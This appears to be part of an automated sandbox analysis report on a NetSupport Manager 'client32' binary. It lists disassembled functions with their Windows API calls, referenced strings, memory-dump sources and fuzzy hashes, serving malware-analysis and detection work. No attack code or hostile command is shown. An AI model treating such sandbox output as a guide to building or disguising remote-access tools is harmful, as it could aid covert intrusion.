                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __fread_nolock_fseek$_free_malloc_memset
                                                                                                                                                                • String ID: PCIR
                                                                                                                                                                • API String ID: 2419779768-1011558323
                                                                                                                                                                • Opcode ID: 81c3817886dc5dbe589c173359df18430558f154d2dd439929bf4d11460d0680
                                                                                                                                                                • Instruction ID: 1ccd7dea2f775c367685aa3e1c73f4b59a6156879e869ee7e214f681fe7cb03c
                                                                                                                                                                • Opcode Fuzzy Hash: 81c3817886dc5dbe589c173359df18430558f154d2dd439929bf4d11460d0680
                                                                                                                                                                • Instruction Fuzzy Hash: A94106B1F01318ABEB10CFA4DD41BDEB7BEEF81308F104069EC09AB240DA72A901C795
                                                                                                                                                                Function 1106B430 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 121timeCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetLocalTime.KERNEL32(?,000000F2,00000001), ref: 1106B4C0
                                                                                                                                                                • wsprintfA.USER32 ref: 1106B511
                                                                                                                                                                • wvsprintfA.USER32(00000000,00000000,?), ref: 1106B540
                                                                                                                                                                • _fputs.LIBCMT ref: 1106B5A5
                                                                                                                                                                  • Part of subcall function 11144DC0: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,NSM.LIC), ref: 11144DE7
                                                                                                                                                                  • Part of subcall function 11163FED: __fsopen.LIBCMT ref: 11163FFA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EnvironmentExpandLocalStringsTime__fsopen_fputswsprintfwvsprintf
                                                                                                                                                                • String ID: %02d-%s-%02d %02d:%02d:%02d $..\ctl32\Connect.cpp$MODEM.LOG$_tcslen (buf) < _tsizeof (buf)
                                                                                                                                                                • API String ID: 2115059068-1537580878
                                                                                                                                                                • Opcode ID: fa61c650d943bb0fa491be057d51e2ac83cf3ef0e888a2d54108ae40a0af48be
                                                                                                                                                                • Instruction ID: 5d2c35739838bb834d3b3d3efafd746ba003c3fabde1782874e9b65cfd7eed37
                                                                                                                                                                • Opcode Fuzzy Hash: fa61c650d943bb0fa491be057d51e2ac83cf3ef0e888a2d54108ae40a0af48be
                                                                                                                                                                • Instruction Fuzzy Hash: 7541CBF590012D9AC715CF64DC80BFEB7B9AF44348F0481E9E9095B145EA7166C9CBA4
                                                                                                                                                                Function 11147400 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 114threadCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • %02X , xrefs: 111474D2
                                                                                                                                                                • Callstack:, xrefs: 111474EF
                                                                                                                                                                • EAX=%08X EBX=%08X ECX=%08X EDX=%08X ESI=%08XEDI=%08X EBP=%08X ESP=%08X EIP=%08X FLG=%08XCS=%04X DS=%04X SS=%04X ES=%04X FS=%04X GS=%04X TID=%XEIP:, xrefs: 1114748D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wsprintf$CurrentReadThread
                                                                                                                                                                • String ID: Callstack:$%02X $EAX=%08X EBX=%08X ECX=%08X EDX=%08X ESI=%08XEDI=%08X EBP=%08X ESP=%08X EIP=%08X FLG=%08XCS=%04X DS=%04X SS=%04X ES=%04X FS=%04X GS=%04X TID=%XEIP:
                                                                                                                                                                • API String ID: 477357799-160799177
                                                                                                                                                                • Opcode ID: 3b29731f2fcac8cdf4188579606b588cad6f6aa37c3165fe8824c1b26f510daf
                                                                                                                                                                • Instruction ID: 688bc027546cad6e23cb765a90b036e17549c8c065315ec51cb57d9c97b2bd93
                                                                                                                                                                • Opcode Fuzzy Hash: 3b29731f2fcac8cdf4188579606b588cad6f6aa37c3165fe8824c1b26f510daf
                                                                                                                                                                • Instruction Fuzzy Hash: 29411CB1604705ABD754CFA9DC80FA7B7A9AB88704F144918F96EC7244EB30B9048BA1
                                                                                                                                                                Function 11015500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 113COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • SetPropA.USER32(?,?), ref: 1101556F
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                  • Part of subcall function 11015290: BeginPaint.USER32(?,?), ref: 110152BF
                                                                                                                                                                  • Part of subcall function 11015290: GetWindowRect.USER32(?,?), ref: 110152D7
                                                                                                                                                                  • Part of subcall function 11015290: _memset.LIBCMT ref: 110152E5
                                                                                                                                                                  • Part of subcall function 11015290: CreateFontIndirectA.GDI32(?), ref: 11015301
                                                                                                                                                                  • Part of subcall function 11015290: SelectObject.GDI32(00000000,00000000), ref: 11015315
                                                                                                                                                                  • Part of subcall function 11015290: SetBkMode.GDI32(00000000,00000001), ref: 11015320
                                                                                                                                                                  • Part of subcall function 11015290: BeginPath.GDI32(00000000), ref: 1101532D
                                                                                                                                                                  • Part of subcall function 11015290: TextOutA.GDI32(00000000,00000000,00000000), ref: 11015350
                                                                                                                                                                  • Part of subcall function 11015290: EndPath.GDI32(00000000), ref: 11015357
                                                                                                                                                                  • Part of subcall function 11015290: PathToRegion.GDI32(00000000), ref: 1101535E
                                                                                                                                                                  • Part of subcall function 11015290: CreateSolidBrush.GDI32(?), ref: 11015370
                                                                                                                                                                  • Part of subcall function 11015290: CreateSolidBrush.GDI32(?), ref: 11015386
                                                                                                                                                                  • Part of subcall function 11015290: CreatePen.GDI32(00000000,00000002,?), ref: 110153A0
                                                                                                                                                                  • Part of subcall function 11015290: SelectObject.GDI32(00000000,00000000), ref: 110153AE
                                                                                                                                                                  • Part of subcall function 11015290: SelectObject.GDI32(00000000,?), ref: 110153BE
                                                                                                                                                                  • Part of subcall function 11015290: GetRgnBox.GDI32(00000000,?), ref: 110153CB
                                                                                                                                                                • GetPropA.USER32(?), ref: 1101557E
                                                                                                                                                                • wsprintfA.USER32 ref: 110155B3
                                                                                                                                                                • RemovePropA.USER32(?), ref: 110155E8
                                                                                                                                                                • DefWindowProcA.USER32(?,?,?,?), ref: 11015611
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Create$ObjectPathPropSelect$BeginBrushSolidWindowwsprintf$ErrorExitFontIndirectLastMessageModePaintProcProcessRectRegionRemoveText_memset
                                                                                                                                                                • String ID: ..\ctl32\NSMIdentifyWnd.cpp$NSMIdentifyWnd::m_aProp$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
                                                                                                                                                                • API String ID: 1924375018-841114059
                                                                                                                                                                • Opcode ID: 349e3198e4ee11d8f994cce4f4d7fe91b877becd306935b01eaf7a21f5783bae
                                                                                                                                                                • Instruction ID: fc00b609a2f261b647cf9ab1963ef075e81928135c8218ba30019119ab5d925d
                                                                                                                                                                • Opcode Fuzzy Hash: 349e3198e4ee11d8f994cce4f4d7fe91b877becd306935b01eaf7a21f5783bae
                                                                                                                                                                • Instruction Fuzzy Hash: 1131E775E01029ABD714DFA4DC80FBEB379EF4A309F04406AF51A9F148EA7A9940CB71
                                                                                                                                                                Function 11005190 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 104windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetMenuItemCount.USER32(?), ref: 1100519E
                                                                                                                                                                • _memset.LIBCMT ref: 110051C0
                                                                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 110051D4
                                                                                                                                                                • CheckMenuItem.USER32(?,00000000,00000000), ref: 11005231
                                                                                                                                                                • EnableMenuItem.USER32(?,00000000,00000000), ref: 11005247
                                                                                                                                                                • GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005268
                                                                                                                                                                • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005294
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ItemMenu$Info$CheckCountEnable_memset
                                                                                                                                                                • String ID: 0
                                                                                                                                                                • API String ID: 2755257978-4108050209
                                                                                                                                                                • Opcode ID: ed19a4d0eac54c607b6a919a5e70af2297959f222d84ccf27589c69c777b0ba6
                                                                                                                                                                • Instruction ID: ff6163613c0a8cbc830ef1528835912891ededd95cc8b4eaa22ca2fcf9c2cdf5
                                                                                                                                                                • Opcode Fuzzy Hash: ed19a4d0eac54c607b6a919a5e70af2297959f222d84ccf27589c69c777b0ba6
                                                                                                                                                                • Instruction Fuzzy Hash: 71318E70D11219ABEB01DFA4D885BEEBBFCEF46758F008059F951E6240E7759944CB60
                                                                                                                                                                Function 1101D1B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 100registryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • _memset.LIBCMT ref: 1101D1E0
                                                                                                                                                                • GetClassInfoExA.USER32(00000000,NSMChatSizeWnd,?), ref: 1101D1FA
                                                                                                                                                                • _memset.LIBCMT ref: 1101D20A
                                                                                                                                                                • RegisterClassExA.USER32(?), ref: 1101D24B
                                                                                                                                                                • CreateWindowExA.USER32(00000000,NSMChatSizeWnd,11194244,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 1101D27E
                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 1101D28B
                                                                                                                                                                • DestroyWindow.USER32(00000000), ref: 1101D292
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$Class_memset$CreateDestroyInfoRectRegister
                                                                                                                                                                • String ID: NSMChatSizeWnd
                                                                                                                                                                • API String ID: 2883038198-4119039562
                                                                                                                                                                • Opcode ID: 87aebd6e18ee9abdefb850bcd11d4769ee8e47b38e4dbf48374c28c167509a6c
                                                                                                                                                                • Instruction ID: df00defde950c6a972f57fa33671139d82de9fa74eae4c6bde258e6239c9b3d1
                                                                                                                                                                • Opcode Fuzzy Hash: 87aebd6e18ee9abdefb850bcd11d4769ee8e47b38e4dbf48374c28c167509a6c
                                                                                                                                                                • Instruction Fuzzy Hash: C7314DB5D0021DAFDB10DFA5DD84BEEF7B8EB44628F20012EE925B7240D735A905CB64
                                                                                                                                                                Function 1103D160 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 98synchronizationCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • _memset.LIBCMT ref: 1103D18F
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000125), ref: 1103D1BD
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 1103D25C
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1103D26C
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 1103D279
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle$FileModuleNameObjectSingleWait_memset
                                                                                                                                                                • String ID: /247$" /a$RunAnnot
                                                                                                                                                                • API String ID: 2581068044-4059077130
                                                                                                                                                                • Opcode ID: b839e70076fc368ba000d97afe45d019281ed31407febcd3e3d047b5c4491ca4
                                                                                                                                                                • Instruction ID: dc76f3c11fb5ad4c0452055a60ef983052eda761819ccc7684b04031b26646f7
                                                                                                                                                                • Opcode Fuzzy Hash: b839e70076fc368ba000d97afe45d019281ed31407febcd3e3d047b5c4491ca4
                                                                                                                                                                • Instruction Fuzzy Hash: 4541C030A04319AFEB11DFA4CC84FDDB7B9EB48704F1080A5E6589B284DB71E944CF90
                                                                                                                                                                Function 11009480 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 92fileCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • _strncmp.LIBCMT ref: 110094BA
                                                                                                                                                                • _strncmp.LIBCMT ref: 110094CA
                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,59FD48C0), ref: 1100956B
                                                                                                                                                                Strings
                                                                                                                                                                • http://, xrefs: 110094B5, 110094C8
                                                                                                                                                                • https://, xrefs: 110094AF
                                                                                                                                                                • IsA(), xrefs: 11009525, 1100954D
                                                                                                                                                                • <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td , xrefs: 110094F1
                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11009520, 11009548
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _strncmp$FileWrite
                                                                                                                                                                • String ID: <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td $IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://$https://
                                                                                                                                                                • API String ID: 1635020204-3154135529
                                                                                                                                                                • Opcode ID: 1ee18467de2b50961b36ac191e3519ec84f0e18adc4b6e033caa9cb85be21952
                                                                                                                                                                • Instruction ID: 44b96e65d2693aff714dc80cf82c9d5e02741e67842f845641f16be57889b7bd
                                                                                                                                                                • Opcode Fuzzy Hash: 1ee18467de2b50961b36ac191e3519ec84f0e18adc4b6e033caa9cb85be21952
                                                                                                                                                                • Instruction Fuzzy Hash: 3B319F75E4061AABDB00CF95DC45FEEB7B8FF49658F014258E825A7280EB75A504CBA0
                                                                                                                                                                Function 11143470 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 91libraryloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(00000001,00000001,1102E392,00000001), ref: 111434D6
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 111434E8
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 11143524
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 11143541
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
